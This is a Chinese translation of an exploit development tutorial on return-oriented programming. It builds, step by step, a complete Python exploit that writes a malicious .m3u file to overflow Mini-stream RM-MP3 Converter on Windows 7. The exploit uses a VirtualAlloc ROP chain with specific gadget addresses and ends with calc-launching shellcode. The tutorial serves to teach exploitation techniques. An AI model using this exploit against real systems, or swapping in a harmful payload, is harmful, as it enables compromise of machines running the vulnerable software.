- 第一部分: Introduction to Exploit Development
- 第二部分:Saved Return Pointer Overflows
- 第三部分:Structured Exception Handler (SEH)
- 第四部分:Egg Hunters
- 第五部分:Unicode 0x00410041
- 第六部分:WIN32 shellcode 编写
- 第七部分:返回导向编程(ROP)
- 第八部分:堆喷射第一节【覆写 EIP】
- 第九部分:堆喷射[第二章:UAF]
- 第十部分:内核利用程序之栈溢出
- 第十一部分:内核利用程序之任意位置任意写
- 第十二部分:内核利用程序之空指针引用
- 第十三部分:内核利用程序之未初始化栈变量
- 第十四部分:内核利用程序之整数溢出
- 第十五部分:内核利用程序之 UAF
- 第十六部分:内核利用程序之池溢出
- 第十七部分:内核利用程序之任意位置任意写
- 第十八篇:内核利用程序之 RS2 Bitmap 巫术
- 第十九篇:内核利用程序之 Razer
构建 ROP-Chain
在开始之前,像之前看到的我们可以用 retn 指令地址覆写 EIP, 如果你打开 rop.txt 你可以选择其中一个 retn 地址,用这个地址替换 BBBB, 别忘记填充 4 个自己(ESP=EIP+4)
#!/usr/bin/python import sys, struct file="crash.m3u" rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP #---------------------------------------------------------------------# # Badchars: '\x00\x09\x0a' # # kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll) # # EIP: 0x10019C60 Random RETN (MSRMfilter03.dll) # #---------------------------------------------------------------------# crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + "C"*(7572-len(rop)) writeFile = open (file, "w") writeFile.write( crash ) writeFile.close()
不错,下面看看 VirtualAlloc 这个 API. 我建议你花点时间读下 MSDN 文件,便于更好理解我们要使用的参数。
VirtualAlloc: MSDN
结构: 参数: LPVOID WINAPI VirtualAlloc( => A pointer to VirtualAlloc() _In_opt_ LPVOID lpAddress, => Return Address (Redirect Execution to ESP) _In_ SIZE_T dwSize, => dwSize (0x1) _In_ DWORD flAllocationType, => flAllocationType (0x1000) _In_ DWORD flProtect => flProtect (0x40) );
可以看到大部分参数值只需要保持默认即可. 你同样可以用 VirtualProtect 这个 API 去完成任务。
VirtualProtect: MSDN
结构: 参数: BOOL WINAPI VirtualProtect( => A pointer to VirtualProtect() _In_ LPVOID lpAddress, => Return Address (Redirect Execution to ESP) _In_ SIZE_T dwSize, => dwSize up to you to chose as needed (0x201) _In_ DWORD flNewProtect, => flNewProtect (0x40) _Out_ PDWORD lpflOldProtect => A writable pointer );
记住这些信息,开始改变我们的 POC, 使我们对 ROP-Chain 有更清晰的认识
#!/usr/bin/python import sys, struct file="crash.m3u" #---------------------------------------------------------[Structure]-# # LPVOID WINAPI VirtualAlloc( => PTR to VirtualAlloc # # _In_opt_ LPVOID lpAddress, => Return Address (Call to ESP) # # _In_ SIZE_T dwSize, => dwSize (0x1) # # _In_ DWORD flAllocationType, => flAllocationType (0x1000) # # _In_ DWORD flProtect => flProtect (0x40) # # ); # #---------------------------------------------------[Register Layout]-# # Remember (1) the stack grows downwards so we need to load the # # values into the registers in reverse order! (2) We are going to do # # some clever trickery to align our return after executing. To # # acchieve this we will be filling EDI with a ROP-Nop and we will be # # skipping ESP leaving it intact. # # # # EAX 90909090 => Nop # # ECX 00000040 => flProtect # # EDX 00001000 => flAllocationType # # EBX 00000001 => dwSize # # ESP ???????? => Leave as is # # EBP ???????? => Call to ESP (jmp, call, push,..) # # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of 0x1005d060 # # EDI 10019C60 => ROP-Nop same as EIP # #---------------------------------------------------------------------# rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP #---------------------------------------------------------------------# # Badchars: '\x00\x09\x0a' # # kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll) # # EIP: 0x10019C60 Random RETN (MSRMfilter03.dll) # #---------------------------------------------------------------------# crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + "C"*(7572-len(rop)) writeFile = open (file, "w") writeFile.write( crash ) writeFile.close()
现在我们的任务是把 ROP-Chain 综合在一起设置 VirtualAlloc 的值. 我们需要整理这些指针,因为某些指令的执行可能会改变已经设置好的寄存器. 先整理一些简单的
(1) EDI -> We need to put a ROP-Nop in EDI 0x10029b57 # POP EDI # RETN 0x1002b9ff # ROP-Nop (we already have this value from EIP) (2) EBP -> Redirect Execution flow to ESP 0x100532ed # POP EBP # RETN 0x100371f5 # CALL ESP (!mona jmp -r ESP -m MSRMfilter03.dll -cpb '\x00\x09\x0a') (3) EAX -> Fill with a regular NOP 0x10030361 # POP EAX # RETN 0x90909090 # NOP (just a regular NOP) (4) We need to end our chain with a PUSHAD 0x10014720 # PUSHAD # RETN (can be found in rop_virtualprotect.txt)
别的一些可能令人费解,需要一些创造力. 但是在我的努力下能把我们需要的指令链在一起. 下面就是我布置的 ROP-Chain, 但这并不是唯一的选择. 布置 ROP 链有很多的方式,发挥你的创造力吧。
(5) EBX -> dwSize (0x1) 0x10013b1c # POP EBX # RETN 0xffffffff # will be 0x1 (EBX will be set to 0xffffffff) 0x100319d3 # INC EBX # FPATAN # RETN \ Increasing EBX twice will set EBX to 0x00000001 0x100319d3 # INC EBX # FPATAN # RETN / (6) EDX -> flAllocationType (0x1000) 0x1003fb3f # MOV EDX,E58B0001 # POP EBP # RETN (we move a static value into EDX for calculations) 0x41414141 # padding for POP EBP (compensation for the POP) 0x10013b1c # POP EBX # RETN 0x1A750FFF # ebx+edx => 0x1000 flAllocationType (FFFFFFFF-E58B0001=1A74FFFE => 1A74FFFE+00001001=1A750FFF) 0x10029f3e # ADD EDX,EBX # POP EBX # RETN 10 (when we add these valuse together the result is 0x00001000) 0x1002b9ff # Rop-Nop to compensate \ 0x1002b9ff # Rop-Nop to compensate | 0x1002b9ff # Rop-Nop to compensate | This is to compensate for the POP and RETN 10 0x1002b9ff # Rop-Nop to compensate | 0x1002b9ff # Rop-Nop to compensate | 0x1002b9ff # Rop-Nop to compensate / (7) ECX -> flProtect (0x40) (This technique works because EDX points to a valid memory location at run-time!! I tested this on windows XP and there it didn't seem to be the case. It would be an interesting exercise to make this gadget more universal.) 0x100280de # POP ECX # RETN 0xffffffff # will become 0x40 (ECX will be set to 0xffffffff) 0x1002e01b # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN \ ECX will be set to 0x00000001 0x1002e01b # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN / 0x1002a487 # ADD ECX,ECX # RETN \ 0x1002a487 # ADD ECX,ECX # RETN | 0x1002a487 # ADD ECX,ECX # RETN | Adding ECX to itself cycles ECX -> 1,2,4,8,10,20,40 -> 0x00000040 0x1002a487 # ADD ECX,ECX # RETN | 0x1002a487 # ADD ECX,ECX # RETN | 0x1002a487 # ADD ECX,ECX # RETN / (8) ESI -> VirtualAlloc (We already have a pointer to VirtualAlloc (0x1005d060) but we need the DWORD value that is located at that pointer. Again here EBP points to a valid memory address (untested on XP).) 0x1002ba02 # POP EAX # RETN 0x1005d060 # kernel32.virtualalloc 0x10027f59 # MOV EAX,DWORD PTR DS:[EAX] # RETN (get the DWORD value located at 0x1005d060) 0x1005bb8e # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN (EAX -> ESI)
有些序列似乎有点复杂,但他们不是很难理解,需要一些时间来看看,理解它们。正如你所看到的一些小配件操纵多个寄存器加载合适的值. 我们需要布置的小配件在这不会影响我们的 ROP 链. 是时候把所有东西放在一起,调整我们的 POC 如下:
#!/usr/bin/python import sys, struct file="crash.m3u" #---------------------------------------------------------[Structure]-# # LPVOID WINAPI VirtualAlloc( => PTR to VirtualAlloc # # _In_opt_ LPVOID lpAddress, => Return Address (Call to ESP) # # _In_ SIZE_T dwSize, => dwSize (0x1) # # _In_ DWORD flAllocationType, => flAllocationType (0x1000) # # _In_ DWORD flProtect => flProtect (0x40) # # ); # #---------------------------------------------------[Register Layout]-# # Remember (1) the stack grows downwards so we need to load the # # values into the registers in reverse order! (2) We are going to do # # some clever trickery to align our return after executing. To # # acchieve this we will be filling EDI with a ROP-Nop and we will be # # skipping ESP leaving it intact. # # # # EAX 90909090 => Nop # # ECX 00000040 => flProtect # # EDX 00001000 => flAllocationType # # EBX 00000001 => dwSize # # ESP ???????? => Leave as is # # EBP ???????? => Call to ESP (jmp, call, push,..) # # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of 0x1005d060 # # EDI 10019C60 => ROP-Nop same as EIP # #---------------------------------------------------------------------# rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP rop += struct.pack('<L',0x10029b57) # POP EDI # RETN rop += struct.pack('<L',0x1002b9ff) # ROP-Nop #-----------------------------------------[ROP-Nop -> EDI]-# rop += struct.pack('<L',0x100280de) # POP ECX # RETN rop += struct.pack('<L',0xffffffff) # will become 0x40 rop += struct.pack('<L',0x1002e01b) # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN rop += struct.pack('<L',0x1002e01b) # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN #--------------------------------[flProtect (0x40) -> ECX]-# rop += struct.pack('<L',0x1002ba02) # POP EAX # RETN rop += struct.pack('<L',0x1005d060) # kernel32.virtualalloc rop += struct.pack('<L',0x10027f59) # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += struct.pack('<L',0x1005bb8e) # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN #------------------------------------[VirtualAlloc -> ESI]-# rop += struct.pack('<L',0x1003fb3f) # MOV EDX,E58B0001 # POP EBP # RETN rop += struct.pack('<L',0x41414141) # padding for POP EBP rop += struct.pack('<L',0x10013b1c) # POP EBX # RETN rop += struct.pack('<L',0x1A750FFF) # ebx+edx => 0x1000 flAllocationType rop += struct.pack('<L',0x10029f3e) # ADD EDX,EBX # POP EBX # RETN 10 rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate #-----------------------[flAllocationType (0x1000) -> EDX]-# rop += struct.pack('<L',0x100532ed) # POP EBP # RETN rop += struct.pack('<L',0x100371f5) # CALL ESP #----------------------------------------[CALL ESP -> EBP]-# rop += struct.pack('<L',0x10013b1c) # POP EBX # RETN rop += struct.pack('<L',0xffffffff) # will be 0x1 rop += struct.pack('<L',0x100319d3) # INC EBX # FPATAN # RETN rop += struct.pack('<L',0x100319d3) # INC EBX # FPATAN # RETN #------------------------------------[dwSize (0x1) -> EBX]-# rop += struct.pack('<L',0x10030361) # POP EAX # RETN rop += struct.pack('<L',0x90909090) # NOP #---------------------------------------------[NOP -> EAX]-# rop += struct.pack('<L',0x10014720) # PUSHAD # RETN #----------------------------------------[PUSHAD -> pwnd!]-# #---------------------------------------------------------------------# # Badchars: '\x00\x09\x0a' # # kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll) # # EIP: 0x10019C60 Random RETN (MSRMfilter03.dll) # #---------------------------------------------------------------------# crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + "C"*(7572-len(rop)) writeFile = open (file, "w") writeFile.write( crash ) writeFile.close()
你可以调试这个 ROP 链,以确保一切按计划进行。
在下面的截图中可以看到 VirtualAlloc 是在堆栈上被调用的. 布置在后面的任何代码都会被执行。
ROP 第二阶段就是要插入我们要执行的 shellcode, 由于我们没有分配大量的内存,所以我们可控的空间是有限的. 没关系,我使用 SkyLined 的 calc shellcode(有兴趣的话你可以看看这里). 但其实可以分配更大内存的,这留给你们去完成。
#!/usr/bin/python #----------------------------------------------------------------------------------# # Exploit: Mini-stream RM-MP3 Converter (*.m3u) # # OS: Win7 Pro SP1 # # Author: b33f (Ruben Boonen) # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications # # /ce47c348747cd05020b242da250c0da3-Mini-streamRM-MP3Converter.exe # #----------------------------------------------------------------------------------# # This exploit was created for Part 7 of my Exploit Development tutorial # # series - http://www.fuzzysecurity.com/tutorials/expDev/7.html # #----------------------------------------------------------------------------------# import sys, struct file="crash.m3u" #---------------------------------------------------------[Structure]-# # LPVOID WINAPI VirtualAlloc( => PTR to VirtualAlloc # # _In_opt_ LPVOID lpAddress, => Return Address (Call to ESP) # # _In_ SIZE_T dwSize, => dwSize (0x1) # # _In_ DWORD flAllocationType, => flAllocationType (0x1000) # # _In_ DWORD flProtect => flProtect (0x40) # # ); # #---------------------------------------------------[Register Layout]-# # Remember (1) the stack grows downwards so we need to load the # # values into the registers in reverse order! (2) We are going to do # # some clever trickery to align our return after executing. To # # acchieve this we will be filling EDI with a ROP-Nop and we will be # # skipping ESP leaving it intact. # # # # EAX 90909090 => Nop # # ECX 00000040 => flProtect # # EDX 00001000 => flAllocationType # # EBX 00000001 => dwSize # # ESP ???????? => Leave as is # # EBP ???????? => Call to ESP (jmp, call, push,..) # # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of 0x1005d060 # # EDI 10019C60 => ROP-Nop same as EIP # #---------------------------------------------------------------------# rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP rop += struct.pack('<L',0x10029b57) # POP EDI # RETN rop += struct.pack('<L',0x1002b9ff) # ROP-Nop #-----------------------------------------[ROP-Nop -> EDI]-# rop += struct.pack('<L',0x100280de) # POP ECX # RETN rop += struct.pack('<L',0xffffffff) # will become 0x40 rop += struct.pack('<L',0x1002e01b) # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN rop += struct.pack('<L',0x1002e01b) # INC ECX # MOV DWORD PTR DS:[EDX],ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN rop += struct.pack('<L',0x1002a487) # ADD ECX,ECX # RETN #--------------------------------[flProtect (0x40) -> ECX]-# rop += struct.pack('<L',0x1002ba02) # POP EAX # RETN rop += struct.pack('<L',0x1005d060) # kernel32.virtualalloc rop += struct.pack('<L',0x10027f59) # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += struct.pack('<L',0x1005bb8e) # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN #------------------------------------[VirtualAlloc -> ESI]-# rop += struct.pack('<L',0x1003fb3f) # MOV EDX,E58B0001 # POP EBP # RETN rop += struct.pack('<L',0x41414141) # padding for POP EBP rop += struct.pack('<L',0x10013b1c) # POP EBX # RETN rop += struct.pack('<L',0x1A750FFF) # ebx+edx => 0x1000 flAllocationType rop += struct.pack('<L',0x10029f3e) # ADD EDX,EBX # POP EBX # RETN 10 rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate rop += struct.pack('<L',0x1002b9ff) # Rop-Nop to compensate #-----------------------[flAllocationType (0x1000) -> EDX]-# rop += struct.pack('<L',0x100532ed) # POP EBP # RETN rop += struct.pack('<L',0x100371f5) # CALL ESP #----------------------------------------[CALL ESP -> EBP]-# rop += struct.pack('<L',0x10013b1c) # POP EBX # RETN rop += struct.pack('<L',0xffffffff) # will be 0x1 rop += struct.pack('<L',0x100319d3) # INC EBX # FPATAN # RETN rop += struct.pack('<L',0x100319d3) # INC EBX # FPATAN # RETN #------------------------------------[dwSize (0x1) -> EBX]-# rop += struct.pack('<L',0x10030361) # POP EAX # RETN rop += struct.pack('<L',0x90909090) # NOP #---------------------------------------------[NOP -> EAX]-# rop += struct.pack('<L',0x10014720) # PUSHAD # RETN #----------------------------------------[PUSHAD -> pwnd!]-# # SkyLined's Calc shellcode calc = ( "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64" "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B" "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20" "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07" "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74" "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7") #---------------------------------------------------------------------# # Badchars: '\x00\x09\x0a' # # kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll) # # EIP: 0x10019C60 Random RETN (MSRMfilter03.dll) # #---------------------------------------------------------------------# shell = "\x90"*5 + calc crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + shell + "C"*(7572-len(rop + shell)) writeFile = open (file, "w") writeFile.write( crash ) writeFile.close()
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